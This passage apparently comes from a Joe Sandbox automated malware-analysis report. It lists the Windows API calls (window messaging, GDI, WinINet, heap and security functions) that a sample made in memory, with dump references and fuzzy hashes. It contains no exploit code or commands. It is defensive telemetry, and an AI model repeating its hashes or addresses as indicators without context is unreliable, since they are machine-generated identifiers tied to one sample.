                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00A86CC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MessageSendShow
                                                                                              • String ID:
                                                                                              • API String ID: 3688381893-0
                                                                                              • Opcode ID: ecd7ff9d981aa437d25c4a43cc96efe924a7173f379ae388f4b4a4441e3ad4f7
                                                                                              • Instruction ID: 94d21153a9f8ee39efa4c69f213b0ee0c785a9c4b2aec6b970bac3dc8b46fe9d
                                                                                              • Opcode Fuzzy Hash: ecd7ff9d981aa437d25c4a43cc96efe924a7173f379ae388f4b4a4441e3ad4f7
                                                                                              • Instruction Fuzzy Hash: 7941D3B5A04104AFEB24EF68CD58FB97BA5EB09360F150228F899A73E1D371ED41CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 801cbdfc2af3509944c05a93589132390caad3556e1b3c42647b208822d342b6
                                                                                              • Instruction ID: c93b6ebeb4731fa32aac49de5806a82623f2a3cf50737892c4106bf3614780c7
                                                                                              • Opcode Fuzzy Hash: 801cbdfc2af3509944c05a93589132390caad3556e1b3c42647b208822d342b6
                                                                                              • Instruction Fuzzy Hash: 1341C132A00214AFCB24DF7CD981B5DB7B5EF89314B154678EA15EB3A2DB31AD01CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                              • String ID:
                                                                                              • API String ID: 4210589936-0
                                                                                              • Opcode ID: 405a10a8e062aa0ddaa5225d3ecff5be65f67a3ea40a8ab9c849137f8271536d
                                                                                              • Instruction ID: c25644ec44a00899c3f4a853d6a7c75c2c0d4c026436041bb25212e6902b88c0
                                                                                              • Opcode Fuzzy Hash: 405a10a8e062aa0ddaa5225d3ecff5be65f67a3ea40a8ab9c849137f8271536d
                                                                                              • Instruction Fuzzy Hash: 98415E75A0860AFBDF159F68D844BFEB774FF45320F208315E429A62E1C7306950CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 00A638CB
                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A63922
                                                                                              • TranslateMessage.USER32(?), ref: 00A6394B
                                                                                              • DispatchMessageW.USER32(?), ref: 00A63955
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A63966
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                              • String ID:
                                                                                              • API String ID: 2256411358-0
                                                                                              • Opcode ID: 747be319d2554b0671dc1c7b97e457b1edb488061b129b372336cad0ba826e57
                                                                                              • Instruction ID: 04654d6edc2fb72b65d2a082f00c117747faf3e57cc8c3da689407c2a1b3de32
                                                                                              • Opcode Fuzzy Hash: 747be319d2554b0671dc1c7b97e457b1edb488061b129b372336cad0ba826e57
                                                                                              • Instruction Fuzzy Hash: 513186736043469EEF25CB749868FB637B8EB06304F540569E462861A1E7B49A87CF21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00A6CF38
                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00A6CF6F
                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,?,00A6C21E,00000000), ref: 00A6CFB4
                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A6C21E,00000000), ref: 00A6CFC8
                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A6C21E,00000000), ref: 00A6CFF2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 3191363074-0
                                                                                              • Opcode ID: 71101abad4f667dbbb22f168b839b0741d32cb28f628028460b411860bdd3650
                                                                                              • Instruction ID: 8f0b5aed080027aa59ef651355dc11a97ceb92fc47a6f51b48003047f3512068
                                                                                              • Opcode Fuzzy Hash: 71101abad4f667dbbb22f168b839b0741d32cb28f628028460b411860bdd3650
                                                                                              • Instruction Fuzzy Hash: 08315C71600309EFDB20DFA5D984ABBBBF9EB14364B10442EF556E2141EB30AE41DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: e845aeb750b90f99a086249a317bb7eefb84f1798863d8ebe4c63ca40062dbf4
                                                                                              • Instruction ID: 0c2353c16d9b58a62a243e048dde7f2ea551fff5e3a9a728987d04de2bdd2dd4
                                                                                              • Opcode Fuzzy Hash: e845aeb750b90f99a086249a317bb7eefb84f1798863d8ebe4c63ca40062dbf4
                                                                                              • Instruction Fuzzy Hash: 7F319E71A00219EFCB00CFA8C999BAE7BB5FB44325F104229FD21A72D1D7709948CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A85745
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A8579D
                                                                                              • _wcslen.LIBCMT ref: 00A857AF
                                                                                              • _wcslen.LIBCMT ref: 00A857BA
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A85816
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 763830540-0
                                                                                              • Opcode ID: e0fce8f4a6c422b86ce91bc991163073d64d14240a668d36d75c5b61e9f7fbb2
                                                                                              • Instruction ID: 8c30b50e24bd148deaa4793b8866d20fba6d0d0c3cb5f1adcf46053ea8f513d8
                                                                                              • Opcode Fuzzy Hash: e0fce8f4a6c422b86ce91bc991163073d64d14240a668d36d75c5b61e9f7fbb2
                                                                                              • Instruction Fuzzy Hash: D2218575D046189ADB20EFB4CC85AEDB7B8FF04724F108626ED29EA190D7748985CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 00A70951
                                                                                              • GetForegroundWindow.USER32 ref: 00A70968
                                                                                              • GetDC.USER32(00000000), ref: 00A709A4
                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00A709B0
                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00A709E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                              • String ID:
                                                                                              • API String ID: 4156661090-0
                                                                                              • Opcode ID: 72f0d19b2aa5743a7ac38d6ea3940376c0f5c4b1a63e05843918006a3d707c3a
                                                                                              • Instruction ID: 642f1aca76b730a2672537ebabaab0039e88db28e30c43f9bbf35eb6bb31f01b
                                                                                              • Opcode Fuzzy Hash: 72f0d19b2aa5743a7ac38d6ea3940376c0f5c4b1a63e05843918006a3d707c3a
                                                                                              • Instruction Fuzzy Hash: 0F216D75600204AFD704EFA5D998AAEBBF9EF48710F048078F95A97362DB30AC05CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00A2CDC6
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A2CDE9
                                                                                                • Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A2CE0F
                                                                                              • _free.LIBCMT ref: 00A2CE22
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A2CE31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: f9b522381f77b60a8c930db42514d2d494a3a137ca48b13cb6097e438ad0595f
                                                                                              • Instruction ID: 64e3cc04ad0c1e7a1420576441ef0709f9b7f92f79124e1513d09c92f329b145
                                                                                              • Opcode Fuzzy Hash: f9b522381f77b60a8c930db42514d2d494a3a137ca48b13cb6097e438ad0595f
                                                                                              • Instruction Fuzzy Hash: 3601D4726016357FA32157BE7C8CD7F696DDEC6BB13160239F905C7200EA718D0286B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00A09693
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A096A2
                                                                                              • BeginPath.GDI32(?), ref: 00A096B9
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A096E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: 34b234f394c00372be7897c3daa5a53c8c1ee40f75264c560216f582c8f20641
                                                                                              • Instruction ID: 097744767b1a9a704a4c80cc5407de60c759ed5088730bf457a39cb23e6a3063
                                                                                              • Opcode Fuzzy Hash: 34b234f394c00372be7897c3daa5a53c8c1ee40f75264c560216f582c8f20641
                                                                                              • Instruction Fuzzy Hash: 48215075902309EBDB11DFA4FC58BAA3BB8BB51765F110216F410A71F2D3719892CFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSysColor.USER32 ref: 00A098CC
                                                                                              • SetTextColor.GDI32(?,?), ref: 00A098D6
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00A098E9
                                                                                              • GetStockObject.GDI32(00000005), ref: 00A098F1
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00A09952
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$LongModeObjectStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1860813098-0
                                                                                              • Opcode ID: 9ae014cddebb1d0756845ad44e7488f2bf0518fcda2baeeca36554993d0e332f
                                                                                              • Instruction ID: 78ec6071a105aad37f00e5ce1edc3d97f06f158539d826bdf1a8d8af887b9b22
                                                                                              • Opcode Fuzzy Hash: 9ae014cddebb1d0756845ad44e7488f2bf0518fcda2baeeca36554993d0e332f
                                                                                              • Instruction Fuzzy Hash: 532124312453949FCB228F74FC98EEB3B60AF53371B19425AE9928A5F3C7344846CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: fbb42df2ec5e841a6740844343ad0cb0ae5502f1282578b3656ea5d5d71ea7cc
                                                                                              • Instruction ID: 1ae236239da2160680807a2cebcf6418498b95c91a24328e92bd013864b4347c
                                                                                              • Opcode Fuzzy Hash: fbb42df2ec5e841a6740844343ad0cb0ae5502f1282578b3656ea5d5d71ea7cc
                                                                                              • Instruction Fuzzy Hash: E801B9B1A41609BFD2086621DE52FFB735DBF25395F104820FE14AE241F770EE5483A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,00A1F2DE,00A23863,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6), ref: 00A22DFD
                                                                                              • _free.LIBCMT ref: 00A22E32
                                                                                              • _free.LIBCMT ref: 00A22E59
                                                                                              • SetLastError.KERNEL32(00000000,009F1129), ref: 00A22E66
                                                                                              • SetLastError.KERNEL32(00000000,009F1129), ref: 00A22E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 69e541c3fa4f59d0b7f0fb5e1ccf4fb8ef288cb47cb1bd4a7fd7afd53ae7a1cd
                                                                                              • Instruction ID: 77eb24f4512617732263a7e4e68bc464097ace33c59cd470f1c8deffafa12292
                                                                                              • Opcode Fuzzy Hash: 69e541c3fa4f59d0b7f0fb5e1ccf4fb8ef288cb47cb1bd4a7fd7afd53ae7a1cd
                                                                                              • Instruction Fuzzy Hash: DC01F4322056307BC612A7BC7D46F7B2A6DEBD53B1B260138F821A21D3EA74CC026720
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32 ref: 00A5002B
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00A50046
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A4FF41,80070057,?,?), ref: 00A50054
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A50064
                                                                                              • CLSIDFromString.OLE32(?,?), ref: 00A50070
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: cf077018a5522a414ec174e9ed37449ab1b633df1613a8e6b56c741e101cec43
                                                                                              • Instruction ID: b221b42cadba59bc9e155fb29959e8849b0332765201d3442ad8e28c970dfa31
                                                                                              • Opcode Fuzzy Hash: cf077018a5522a414ec174e9ed37449ab1b633df1613a8e6b56c741e101cec43
                                                                                              • Instruction Fuzzy Hash: 84018B72600204BFDB108FA8DC04FAA7AADFB447A3F144124FD05D6250E771DD458BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A5E997
                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 00A5E9A5
                                                                                              • Sleep.KERNEL32(00000000), ref: 00A5E9AD
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A5E9B7
                                                                                              • Sleep.KERNEL32 ref: 00A5E9F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 094c3c370fb1537e3c004ab8cddf2d04b9c066055069fe27afefe852ec8555b2
                                                                                              • Instruction ID: d3343948f3aafcbdf25a1636c0a017056cfede9c7e462d69c4f904ca3b842193
                                                                                              • Opcode Fuzzy Hash: 094c3c370fb1537e3c004ab8cddf2d04b9c066055069fe27afefe852ec8555b2
                                                                                              • Instruction Fuzzy Hash: 53011731C01629DBCF04EBE5DD99AEDFB78BB09712F000656E912B2251DB309659CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51114
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51120
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A5112F
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51136
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A5114D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 842720411-0
                                                                                              • Opcode ID: 5594975a53a501adf8dd66bfd9e5491bb54d8fafd517f0decdf3e0ca6e04fe9a
                                                                                              • Instruction ID: 810e14c3bba974061650dd87fd6730ac89419a2871308b1cfe5034ebc7c1176c
